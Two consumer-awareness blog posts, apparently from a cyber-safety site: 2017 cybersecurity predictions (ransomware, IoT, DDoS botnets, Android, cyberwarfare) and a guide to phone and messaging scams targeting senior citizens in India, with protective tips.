What cyber nightmares does 2017 have in store for us?


Ransomware

Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

Taking every idea into consideration


Companies

Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.


Internet of Things

Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security strength in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials in thousands of devices, and other security flaws – all of this together makes them extremely vulnerable to outside attacks.


DDoS

The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after his having reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.


Mobile Phones

The target is clear here as well — Android devices got the worst of it. Which makes sense, given that Android has the greatest market share. Focusing on one single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability.

To complicate matters, updates do not only depend on the rollout of what Android can do, but also depends on each hardware manufacturer’s decision of when and how to incorporate them – if at all. Given the amount of security issues that crop up every month, this situation only puts users at greater risk.


Cyberwarfare

We are living in uncertain times with regards to international relations – threats of commercial warfare, espionage, tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information, at a time when encryption is becoming more popular) and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

The post Cyber Security Predictions for 2017 appeared first on CyberSafety.co.za.

Cyber scams that target senior citizens in India


A senior citizen’s primary gadget is a mobile phone which in earlier years was used to make/ receive calls and SMSes. With rising Internet penetration, children living in different cities and countries, video calls and rising costs; senior citizens have begun to use alternate communication channels like Whatsapp and Skype. Senior citizens have become easy targets for cybercriminals given their trusting nature and poor understanding on how voice and data services work.  Cybercriminals and Spammers target these four types of communication channels (voice, instant messaging, SMS and internet telephony) to defraud senior citizens. The three most prevalent types of scams are:

Missed Call or One Ring Telephone Scams

The most popular one is the “missed call” scam. A missed call from an international number is made to a senior citizen’s phone. When the senior citizen calls back, the call is connected to a premium rate number where the bill rates are significantly higher as there is a third party service charge for these services added to the bill. Senior citizens end up with large postpaid bills or find their prepaid credit wiped out. The modus operandi of these missed call scams is to ensure that once a call back is received, the caller is kept on the line for several minutes. The longer the duration the more money the scammer makes. To do so, either the caller is looped in an interactive voice response system which tells the caller to wait while the call is connected or the caller is connected to a recorded adult phone message. One senior citizen was so perturbed that she wanted to call the police because she heard a woman being beaten and screaming for help. Fortunately for her, she had limited prepaid credit and the call ran out. Many senior citizens become anxious and literarily rush to their telecommunication service provider only to receive a stoic response that they are not responsible for any calls made or received. To resolve their excess charge they are advised to take up the matter with the third party service provider, usually a dubious adult chat firm in a third world country. For the small sum of money lost, the cost of this pursuit would make it an unviable option with no guarantee of refunds.

Senior citizens can protect themselves by:

1.    Restricting outbound international calling,  if there is no necessity to make overseas call

2.    Ignore short duration missed calls from international destinations

3.    Checking the international dial code for missed numbers before returning the call. If the number originates from a country where they do not expect a call from, then it would be best not to return them

Lottery Type Scams 

In fake lottery scams, senior citizens receive SMSes or Whatsapp messages congratulating them on having won a “big lottery” and asking them to quickly claim their money.  One senior citizens though this was a valid claim because “it was not classified as spam” by the service provider. 40% of spam is not blocked by spam filters and spam filters only help but do not guarantee that a communication is legitimate. Once a request for redeeming the claim is made these scams always ask for either personal information or the payment of an advance fee, which when paid is either followed by a further request for money and the eventual disappearance act by the scamster.

 Senior citizens must not share personal data online and always avoid requests made for money to process a lottery win or to release a parcel, or to send a free gift as these are sure signs of fraudulent behavior. Senior citizens should also consult knowledgeable family members or friends before responding.

Disclosure of Personal Information

Extracting personal information which can later be sold or used to access online back accounts is another type of scam. Scammers pose as officials in position of authority (banks, police, and income tax) or as sellers of credits cards/personal loans using these “roles” to exert sufficient pressure to extract personal and financial data.

Senior citizens should always remember that however convincing the callers are information like bank accounts, financial records and passwords are never sought by authorities or banks.